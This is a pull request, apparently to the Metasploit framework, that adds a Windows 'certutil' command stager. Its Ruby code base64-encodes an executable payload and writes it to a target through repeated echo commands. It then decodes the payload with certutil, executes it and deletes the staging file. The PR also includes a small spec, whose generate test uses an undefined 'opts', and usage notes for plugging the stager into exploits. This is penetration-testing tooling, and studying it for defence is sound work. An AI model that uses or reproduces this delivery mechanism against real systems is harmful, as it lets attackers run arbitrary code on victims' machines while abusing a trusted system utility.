### PR TITLE
Add certutil cmdstager

### DIFF
--- a/lib/msf/core/exploit/cmdstager.rb
+++ b/lib/msf/core/exploit/cmdstager.rb
@@ -20,6 +20,7 @@ module Exploit::CmdStager
     :printf => Rex::Exploitation::CmdStagerPrintf,
     :vbs => Rex::Exploitation::CmdStagerVBS,
     :vbs_adodb => Rex::Exploitation::CmdStagerVBS,
+    :certutil => Rex::Exploitation::CmdStagerCertutil,
     :tftp => Rex::Exploitation::CmdStagerTFTP
   }
 

--- a/lib/rex/exploitation/cmdstager.rb
+++ b/lib/rex/exploitation/cmdstager.rb
@@ -2,6 +2,7 @@
 
 require 'rex/exploitation/cmdstager/base'
 require 'rex/exploitation/cmdstager/vbs'
+require 'rex/exploitation/cmdstager/certutil'
 require 'rex/exploitation/cmdstager/debug_write'
 require 'rex/exploitation/cmdstager/debug_asm'
 require 'rex/exploitation/cmdstager/tftp'

--- a/lib/rex/exploitation/cmdstager/certutil.rb
+++ b/lib/rex/exploitation/cmdstager/certutil.rb
@@ -1,0 +1,111 @@
+# -*- coding: binary -*-
+
+require 'rex/text'
+require 'rex/arch'
+require 'msf/core/framework'
+
+module Rex
+module Exploitation
+
+###
+#
+# This class provides the ability to create a sequence of commands from an executable.
+# When this sequence is ran via command injection or a shell, the resulting exe will
+# be written to disk and executed.
+#
+# This particular version uses Windows certutil to base64 decode a file,
+# created via echo >>, and decode it to the final binary.
+#
+#
+# Written by xistence
+# Original discovery by @mattifestation - https://gist.github.com/mattifestation/47f9e8a431f96a266522
+#
+###
+
+class CmdStagerCertutil < CmdStagerBase
+
+  def initialize(exe)
+    super
+
+    @var_encoded = Rex::Text.rand_text_alpha(5)
+    @var_decoded = Rex::Text.rand_text_alpha(5)
+    @decoder     = nil # filled in later
+  end
+
+
+  #
+  # Override just to set the extra byte count
+  #
+  def generate_cmds(opts)
+    # Set the start/end of the commands here (vs initialize) so we have @tempdir
+    @cmd_start = "echo "
+    @cmd_end   = ">>#{@tempdir}#{@var_encoded}.b64"
+    xtra_len = @cmd_start.length + @cmd_end.length + 1
+    opts.merge!({ :extra => xtra_len })
+    super
+  end
+
+
+  #
+  # Simple base64...
+  #
+  def encode_payload(opts)
+    Rex::Text.encode_base64(@exe)
+  end
+
+
+  #
+  # Combine the parts of the encoded file with the stuff that goes
+  # before / after it.
+  #
+  def parts_to_commands(parts, opts)
+
+    cmds = []
+    parts.each do |p|
+      cmd = ''
+      cmd << @cmd_start
+      cmd << p
+      cmd << @cmd_end
+      cmds << cmd
+    end
+
+    cmds
+  end
+
+
+  #
+  # Generate the commands that will decode the file we just created
+  #
+  def generate_cmds_decoder(opts)
+
+    cmds = []
+    cmds << "certutil -decode #{@tempdir}#{@var_encoded}.b64 #{@tempdir}#{@var_decoded}.exe"
+    return cmds
+  end
+
+
+  #
+  # We override compress commands just to stick in a few extra commands
+  # last second..
+  #
+  def compress_commands(cmds, opts)
+    # Make it all happen
+    cmds << "#{@tempdir}#{@var_decoded}.exe"
+
+    # Clean up after unless requested not to..
+    if (not opts[:nodelete])
+      cmds << "del #{@tempdir}#{@var_encoded}.b64"
+      # NOTE: We won't be able to delete the exe while it's in use.
+    end
+
+    super
+  end
+
+  # Windows uses & to concat strings
+  def cmd_concat_operator
+    " & "
+  end
+
+end
+end
+end

--- a/lib/rex/exploitation/cmdstager/certutil.rb
+++ b/lib/rex/exploitation/cmdstager/certutil.rb
@@ -33,9 +33,9 @@ class CmdStagerCertutil < CmdStagerBase
   end
 
 
-  #
   # Override just to set the extra byte count
-  #
+  # @param opts [Array] The options to generate the command line
+  # @return [Array] The complete command line
   def generate_cmds(opts)
     # Set the start/end of the commands here (vs initialize) so we have @tempdir
     @cmd_start = "echo "
@@ -46,18 +46,19 @@ class CmdStagerCertutil < CmdStagerBase
   end
 
 
-  #
-  # Simple base64...
-  #
+  # Simple base64 encoder for the executable
+  # @param opts [Array] The options to generate the command line
+  # @return [String] Base64 encoded executable
   def encode_payload(opts)
     Rex::Text.encode_base64(@exe)
   end
 
 
-  #
   # Combine the parts of the encoded file with the stuff that goes
   # before / after it.
-  #
+  # @param parts [Array] Splitted commands
+  # @param opts [Array] The options to generate the command line
+  # @return [Array] The command line
   def parts_to_commands(parts, opts)
 
     cmds = []
@@ -73,9 +74,9 @@ class CmdStagerCertutil < CmdStagerBase
   end
 
 
-  #
   # Generate the commands that will decode the file we just created
-  #
+  # @param opts [Array] The options to generate the command line
+  # @return [Array] The certutil Base64 decoder part of the command line
   def generate_cmds_decoder(opts)
 
     cmds = []
@@ -84,10 +85,11 @@ class CmdStagerCertutil < CmdStagerBase
   end
 
 
-  #
   # We override compress commands just to stick in a few extra commands
   # last second..
-  #
+  # @param cmds [Array] Complete command line
+  # @param opts [Array] Extra options for command line generation
+  # @return [Array] The complete command line including cleanup
   def compress_commands(cmds, opts)
     # Make it all happen
     cmds << "#{@tempdir}#{@var_decoded}.exe"
@@ -102,6 +104,8 @@ class CmdStagerCertutil < CmdStagerBase
   end
 
   # Windows uses & to concat strings
+  #
+  # @return [String] Concat operator
   def cmd_concat_operator
     " & "
   end

--- a/spec/lib/rex/exploitation/cmdstager/certutil_spec.rb
+++ b/spec/lib/rex/exploitation/cmdstager/certutil_spec.rb
@@ -1,0 +1,29 @@
+# -*- coding:binary -*-
+require 'spec_helper'
+
+require 'rex/exploitation/cmdstager'
+
+describe Rex::Exploitation::CmdStagerCertutil do
+
+  let(:exe) { "MZ" }
+
+  subject(:cmd_stager) do
+    described_class.new(exe)
+  end
+
+  describe '#cmd_concat_operator' do
+    it "returns &" do
+      expect(cmd_stager.cmd_concat_operator).to eq(" & ")
+    end
+  end
+
+  describe '#generate' do
+    it "returns an array of commands" do
+      result = cmd_stager.generate(opts)
+
+      expect(result).to be_kind_of(Array)
+      expect(result).to_not be_empty
+    end
+  end
+
+end


### PR DESCRIPTION
This adds the "certutil" command stager, to decode base64 payloads and execute this on Windows environments, as an alternative to the VBS cmdstager.
Original idea and discovery was done by @mattifestation (https://gist.github.com/mattifestation/47f9e8a431f96a266522)

I've tested this on a Windows 7 platform and didn't need the "-----BEGIN CERTIFICATE-----" and "-----END CERTIFICATE-----" tags around the base64 encoded payload to decode to an EXE.


The easiest way to test this is to pick an exploit that uses the VBS command stager and replace the flavor from ":vbs" to ":certutil", like this:

FROM:
execute_cmdstager({:flavor => :vbs, :linemax => 8100})

TO:
execute_cmdstager({:flavor => :certutil, :linemax => 8100})

I've tested this with my recent exploit "vnc_keyboard_exec".
